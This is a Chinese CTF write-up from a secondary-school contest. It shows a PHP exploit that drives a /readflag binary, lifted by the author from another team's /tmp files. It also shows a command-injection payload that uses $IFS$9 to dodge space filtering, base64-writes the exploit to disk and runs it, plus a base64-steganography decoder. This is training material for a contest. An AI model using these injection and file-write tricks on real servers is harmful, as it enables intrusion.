[第三届全国中学生网络安全竞赛初赛] WriteUp (2)

本题/readflag大概流程就是输入y，然后需要做一个加法运算。正在挨个调的时候，发现一血出了，就看了一下/tmp目录，应该是蹭了一波车，正好看到/tmp目录下有一个exp，手快保存了一下：

<?php $d = array(); $d[0]=array("pipe","r"); $d[1]=array("pipe","w"); $pr=proc_open("/readflag",$d,$pipes); fwrite($pipes[0],"y\n"); $op1=\'\'; $op2=\'\'; $inop=false; while(1){ $ch=stream_get_contents($pipes[1],1); echo $ch; if($ch=="+"){ $inop=true; } if($ch=="="){ break; } if(is_numeric($ch)){ if($inop){ $op2.=$ch; }else{ $op1.=$ch; } } } fwrite($pipes[0],intval($op1)+intval($op2)."\n"); echo stream_get_contents($pipes[1]);

构造一个写入文件的命令，把这个exp用base64编码一下：

php$IFS$9-r$IFS$9\'file_put_contents("/tmp/1.php",base64_decode("PD9waHAKJGQgPSBhcnJheSgpOwokZFswXT1hcnJheSgicGlwZSIsInIiKTsKJGRbMV09YXJyYXkoInBpcGUiLCJ3Iik7CiRwcj1wcm9jX29wZW4oIi9yZWFkZmxhZyIsJGQsJHBpcGVzKTsKZndyaXRlKCRwaXBlc1swXSwieVxuIik7CiRvcDE9Jyc7CiRvcDI9Jyc7CiRpbm9wPWZhbHNlOwp3aGlsZSgxKXsKICAkY2g9c3RyZWFtX2dldF9jb250ZW50cygkcGlwZXNbMV0sMSk7CiAgZWNobyAkY2g7CiAgaWYoJGNoPT0iKyIpewogICAgJGlub3A9dHJ1ZTsKICB9CiAgaWYoJGNoPT0iPSIpewogICAgYnJlYWs7CiAgfQogIGlmKGlzX251bWVyaWMoJGNoKSl7CiAgICBpZigkaW5vcCl7CiAgICAgICRvcDIuPSRjaDsKICAgIH1lbHNlewogICAgICAkb3AxLj0kY2g7CiAgICB9CiAgfQp9CmZ3cml0ZSgkcGlwZXNbMF0saW50dmFsKCRvcDEpK2ludHZhbCgkb3AyKS4iXG4iKTsKZWNobyBzdHJlYW1fZ2V0X2NvbnRlbnRzKCRwaXBlc1sxXSk7"));\'

这样exp就写进/tmp/1.php文件里了，然后用php命令执行：

php$IFS$9/tmp/1.php

得到Flag：

Misc

签到题

用foremost可以分离出一张二维码：

扫描得到Flag：

Avicii

1.txt中文本是base64隐写，网上找来一个脚本：

def get_base64_diff_value(s1, s2): base64chars = \'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\' res = 0 for i in xrange(len(s2)): if s1[i] != s2[i]: return abs(base64chars.index(s1[i]) - base64chars.index(s2[i])) return res
def solve_stego(): with open(\'1.txt\', \'rb\') as f: file_lines = f.readlines() bin_str = \'\' for line in file_lines: steg_line = line.replace(\'\n\', \'\') norm_line = line.replace(\'\n\', \'\').decode(\'base64\').encode(\'base64\').replace(\'\n\', \'\') diff = get_base64_diff_value(steg_line, norm_line) print diff pads_num = steg_line.count(\'=\') if diff: bin_str += bin(diff)[2:].zfill(pads_num * 2) else: bin_str += \'0\' * pads_num * 2 print goflag(bin_str)
def goflag(bin_str): res_str = \'\' for i in xrange(0, len(bin_str), 8): res_str += chr(int(bin_str[i:i + 8], 2)) return res_str if __name__ == \'__main__\': solve_stego()

跑一下1.txt里面的内容得到key：doveee

再用zsteg看一下2.png可以得到隐写文本：